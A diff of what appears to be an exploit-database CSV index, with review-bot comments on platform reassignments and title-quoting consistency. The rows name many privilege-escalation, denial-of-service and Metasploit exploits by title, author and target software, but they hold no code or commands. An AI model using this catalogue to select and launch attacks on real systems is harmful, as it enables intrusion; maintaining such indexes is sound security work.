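Review bot: 37868 moves to `lin_x86-64` because its title names Linux x64, while 37866, 37867, 37869 and 37870 from the same Flash series stay on `linux`. That is consistent if the rule is "architecture-specific platform only when the title states the architecture", but that rule appears nowhere in the hunk; state it in the commit message or the CSV's README so later imports apply it the same way.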
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39669,platforms/linux/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
39669,platforms/lin_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",lin_x86,dos,0
39685,platforms/android/dos/39685.txt,"Google Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
39686,platforms/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0
@ -5110,7 +5110,7 @@ id,file,description,date,author,platform,type,port
39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash (PoC)",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field Overwrite (SEH) (PoC)",2016-05-10,"Zahid Adeel",windows,dos,0
39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21
39797,platforms/win_x86/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",win_x86,dos,21
39799,platforms/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos,0
39800,platforms/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos,0
39801,platforms/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0
@ -5300,7 +5300,7 @@ id,file,description,date,author,platform,type,port
40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
@ -5396,7 +5396,7 @@ id,file,description,date,author,platform,type,port
200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0
206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
@ -5520,7 +5520,7 @@ id,file,description,date,author,platform,type,port
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0
791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
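Review bot: 792 gains quotes around 'PerlIO_Debug()' but the adjacent 791 ("Setuid perl - PerlIO_Debug() Overflow") is left unquoted; apply the same quoting to 791 so the two sibling rows follow one convention.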
@ -5607,8 +5607,8 @@ id,file,description,date,author,platform,type,port
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0
1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation",2005-09-24,kingcope,linux,local,0
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation",2005-09-24,kingcope,linux,local,0
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0
1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0
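Review bot: 1229 (`Qpopper 4.0.8 (Linux)`) is changed from `(poppassd)` to `'poppassd'`, but the sibling context line 1230 (`Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation`) is left in the old parenthesised style. Apply the same change to 1230 so the two Qpopper entries read identically apart from the platform.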
@ -5654,7 +5654,7 @@ id,file,description,date,author,platform,type,port
1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0
1772,platforms/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory Exploit",2006-05-09,"Ruben Santamarta",windows,local,0
1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0
40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
40336,platforms/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0
1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
1911,platforms/windows/local/1911.c,"Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
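Review bot: 40336 changes both the `file` column (`platforms/windows/local/40336.py` to `platforms/win_x86-64/local/40336.py`) and the `platform` column (`windows` to `win_x86-64`). Please confirm the script itself is moved in the same commit, otherwise the CSV path no longer resolves, and that `win_x86-64` is an established platform value rather than a new one introduced here. Separately, this 2016 entry sits between ids 1806 and 1831; since the line is being rewritten anyway, it could be relocated to its id-ordered position.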
@ -5675,8 +5675,8 @@ id,file,description,date,author,platform,type,port
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local,0
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4)",2006-07-14,Sunay,linux,local,0
2013,platforms/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Privilege Escalation",2006-07-15,h00lyshit,linux,local,0
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - (umount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - (mount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0
2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0
@ -5721,7 +5721,7 @@ id,file,description,date,author,platform,type,port
2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0
40380,platforms/windows/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",windows,local,0
40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0
2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0
2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0
2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0
@ -5855,7 +5855,7 @@ id,file,description,date,author,platform,type,port
4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
4460,platforms/lin_x86-64/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local,0
4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
@ -5925,7 +5925,7 @@ id,file,description,date,author,platform,type,port
6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0
6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0
6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - (symlink) Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0
6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
@ -6127,7 +6127,7 @@ id,file,description,date,author,platform,type,port
9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,lin_x86-64,local,0
9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
@ -6202,7 +6202,7 @@ id,file,description,date,author,platform,type,port
9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local,0
9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local,0
9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",linux,local,0
9542,platforms/lin_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",lin_x86,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0
9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,windows,local,0
@ -6582,8 +6582,8 @@ id,file,description,date,author,platform,type,port
14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0
15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
@ -6608,7 +6608,7 @@ id,file,description,date,author,platform,type,port
15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)",2010-10-22,"Tavis Ormandy",linux,local,0
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation",2010-10-22,"Tavis Ormandy",linux,local,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
15344,platforms/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0
15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit",2010-11-01,"Nikita Tarakanov",windows,local,0
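Review bot: the 15304 rewrite moves the opposite way from the rest of this patch. Elsewhere the commit replaces parenthesised component names with quoted ones (`(poppassd)` to `'poppassd'`, `(symlink)` to `'symlink'`), but here the title becomes `(Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation`, introducing a new parenthesised group. Consider `'LD_AUDIT' Arbitrary DSO Load Privilege Escalation` or similar so the naming convention stays uniform.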
@ -6658,7 +6658,7 @@ id,file,description,date,author,platform,type,port
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow",2011-01-01,anonymous,windows,local,0
15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",linux,local,0
15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0
@ -6723,7 +6723,7 @@ id,file,description,date,author,platform,type,port
16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
@ -6760,7 +6760,7 @@ id,file,description,date,author,platform,type,port
16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0
16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16678,platforms/windows/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
16678,platforms/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local,0
16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@ -6870,7 +6870,7 @@ id,file,description,date,author,platform,type,port
17892,platforms/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0
17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0
17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0
17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0
17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0
@ -7277,8 +7277,8 @@ id,file,description,date,author,platform,type,port
19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)",2000-06-07,"Florian Heinz",linux,local,0
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
